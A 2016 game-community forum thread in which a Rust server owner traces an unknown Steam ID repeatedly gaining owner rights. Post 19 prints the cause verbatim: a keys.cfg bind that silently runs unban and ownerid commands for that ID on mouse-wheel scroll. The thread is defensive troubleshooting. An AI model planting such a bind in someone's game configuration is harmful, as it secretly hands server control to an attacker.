1. Hi everyone! please need help...i've recently got a modded server for Rust thats officialy running on game. The thing is that from time to time, a damn user of steam is getting as ownerid on MY server cause i allways check users.cfg file. I've already added his id's on bans.cfg file and added also using rustadmin console...but still happens yesterday...

    ownerid 76561198313319324 "True" "no reason" on users.cfg file.

    When i search for this users id, this is the result (im also from argentina)

    Steam Community :: Dioxaflex

    Any ideas on how to finally kill this insect?

    Thanks a lot!
     
  2. Wulf

    Wulf Community Admin

    Perhaps they guessed your RCON password? Banning via bans.cfg won't stop RCON connections.
     
  3. Change ftp, hosting panel and rcon password
     
  4. ran console command: global.unban 76561198313319324 "True"
    ran console command: global.ownerid 76561198313319324 "True"

    I would love to know what script you have so I can understand what players are trying to do when this happens
    [DOUBLEPOST=1473970464][/DOUBLEPOST]lost the 1st part of my message
    This is a script run on your PC
    [DOUBLEPOST=1473970517][/DOUBLEPOST]I have a player on my server now and his PC is doing the same thing
    We normally ban for it, I am trying to investigate which script is doing it so I can let other Admins know
    [DOUBLEPOST=1473970587][/DOUBLEPOST]Can you think of anything you have added to your rust client in the way of a script or have you visited any dodgy Rust related websites?
    [DOUBLEPOST=1473970627][/DOUBLEPOST]If you add Logger plugin you will see you are continually running this:
    ran console command: global.unban 76561198313319324 "True"
    ran console command: global.ownerid 76561198313319324 "True"
    [DOUBLEPOST=1473970733][/DOUBLEPOST]We really need to work out what causes this script to be added to a client PC
     
  5. thanks...its not the first time...previously with another pass, same happens...now pass has been chagend since tuesday/weds...and again this...
    [DOUBLEPOST=1473975136][/DOUBLEPOST]
    where can i change ftp and hosting panel? rcon pass already being changed 2 days ago...i swear that if i disable rcon port..wont got any future issue..but dont want to...
    Could it be that on windows firewall, i create on inbound rules, both TCP and UPD game port to be open..could it be this? cause if not, my server wont show on rust servers list...
     
  6. Best to talk to your host about that
     

  7. thanks dude...a week ago, i tried using rcon.io site (succes in that) and another web site cant remember now...obviously y clear the rcon.web option till this...but strange issue here is that same thing happened previously to this web thing...really cant get it..

    Could it be that on windows firewall, i create on inbound rules, both TCP and UPD game port to be open..could it be this? i set it open por private, public and domain....cause if not, my server wont show on rust servers list...
    [DOUBLEPOST=1473975667][/DOUBLEPOST]
    Answer is inside your text with Bolt letter..thanks!!!
    [DOUBLEPOST=1473975767][/DOUBLEPOST]
    Resistance...is running on my pc!!! no paid host here...
     
    Last edited by a moderator: Sep 15, 2016
  8. ok did not know that then change rcon password in your bat file and use a good anitvirus in just in case Anitvirus Online Scanner
     
  9. What I am saying is you have been infected with some sort of trojan
    Your rust client (NOT SERVER) is sending the request to unban and add owner for the hacker
    [DOUBLEPOST=1473981380][/DOUBLEPOST]because you are the admin of the server it adds him
    [DOUBLEPOST=1473981447][/DOUBLEPOST]your Rust client keeps spamming these commands to your server due to your trojan
    ran console command: global.unban 76561198313319324 "True"
    ran console command: global.ownerid 76561198313319324 "True"
    [DOUBLEPOST=1473981518][/DOUBLEPOST]This is NOT a password compromise issue
     
  10. Thanks brengun...So whats my solution in this case client is infected...running internal file integrity check on rust from steam will solve it?
     
  11. Based on the player I am dealing with now, no.
    He has tried MalwareBytes and integrity check with no luck.
    He is now running a full AV scan with ESET, no results yet.
    he did have a lot of malware/small trojans so far anyway, so he is now cleaner, but the issue still exists.
    I susggest you install the Logger plugin on your rust server so you can see the command being run in rcon, then you will know when you are clean again.
    [DOUBLEPOST=1473993521][/DOUBLEPOST]I heard of 1 player having his keys.cfg doing it as a key map, but this 1 today for the player I am chatting with has a clean keys.cfg file.
     
  12. Brengun another simple idea is to make a reverse-script saying:
    ran console command: global.unban 76561198313319324 "False"
    ran console command: global.ownerid 76561198313319324 "False"

    wouldn't be at least my first solution? cause if i wait for finding that little trojan, i will loose faith.

    In this case..how would you done it? dnt have any idea on making scripts and running on rust client.
     
  13. Your best option is to find and fix the trojan
     
  14. Thanks Brengun...i've just installed the logger plugin
    Logger for Rust | Oxide
    Can u tell me where is the log file result? cant find much info about this plugin...is this the one u where talking?
     
  15. This is very likely not a hack or a trojan. Just a specific server you may have joined that bound certain keys to execute these commands.
     
  16. Wulf

    Wulf Community Admin

    Logs are under oxide/logs. I'd suggest checking your Rust\cfg\keys.cfg file though to see if someone bound it to a key.
     
  17. Wulf..
    Log files under oxide folder are the basics one...wanna know if logger plugin creates another one more complete..thats the one im looking.

    dont got any keys.cfg file under my rustserver/cfg folder...just got bans, serverauto and users cfg files..any idea? must create it? what should i put inside file?
     
    Last edited by a moderator: Sep 16, 2016
  18. Wulf

    Wulf Community Admin

    Logger creates logs under oxide/logs.

    The keys.cfg is under your client, not server.
     
  19. GUYS....BUSTED!!!!!!!!!!!!
    searching keys.cfg found this:
    over :\SteamLibrary\steamapps\common\Rust\cfg\keys.cfg

    at very ond of the file


    bind leftalt "+altlook"
    bind mouse0 "+attack"
    bind mouse1 "+attack2"
    bind mouse2 "+attack3"
    bind mousewheelup "+invprev"
    bind mousewheeldown "unban 76561198313319324;ownerid 76561198313319324;writecfg;+invnext"

    just changed it to:
    bind mousewheeldown "ban 76561198313319324;writecfg;+invnext"
    =D
     
  20. I had the same issue
    and I make the Users.cfg only Read file

    BUT... I delete the BIND
    and The ownerid Still appearing when I remove the "only read" property...

    that's very bad, Is not a troyan, Is some Plugin or Application related of this